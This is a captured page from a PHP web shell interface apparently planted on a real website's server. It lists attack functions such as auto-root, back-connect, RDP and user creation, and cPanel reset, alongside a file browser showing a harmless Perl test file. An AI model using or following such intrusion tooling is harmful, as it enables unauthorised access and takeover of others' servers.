Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Test-Simple /
t /
regression /
[ HOME SHELL ]
Name
Size
Permission
Action
642_persistent_end.t
445
B
-rw-r--r--
662-tbt-no-plan.t
564
B
-rw-r--r--
684-nested_todo_diag.t
520
B
-rw-r--r--
694_note_diag_return_values.t
401
B
-rw-r--r--
696-intercept_skip_all.t
1005
B
-rw-r--r--
721-nested-streamed-subtest.t
2.89
KB
-rw-r--r--
757-reset_in_subtest.t
289
B
-rw-r--r--
buffered_subtest_plan_buffered...
624
B
-rw-r--r--
builder_does_not_init.t
362
B
-rw-r--r--
errors_facet.t
985
B
-rw-r--r--
inherit_trace.t
548
B
-rw-r--r--
no_name_in_subtest.t
135
B
-rw-r--r--
todo_and_facets.t
906
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : inherit_trace.t
use Test2::Tools::Tiny; use strict; use warnings; use Test2::API qw/context run_subtest intercept/; sub do_it { my $ctx = context(); run_subtest foo => sub { ok(1, "pass"); }, {inherit_trace => 1}; $ctx->release; } do_it(); do_it(); my $events = intercept { do_it(); do_it(); }; for my $st (@$events) { next unless $st->isa('Test2::Event::Subtest'); is($st->trace->nested, 0, "base subtest is not nested"); is($_->trace->nested, 1, "subevent is nested") for @{$st->subevents}; } done_testing;
Close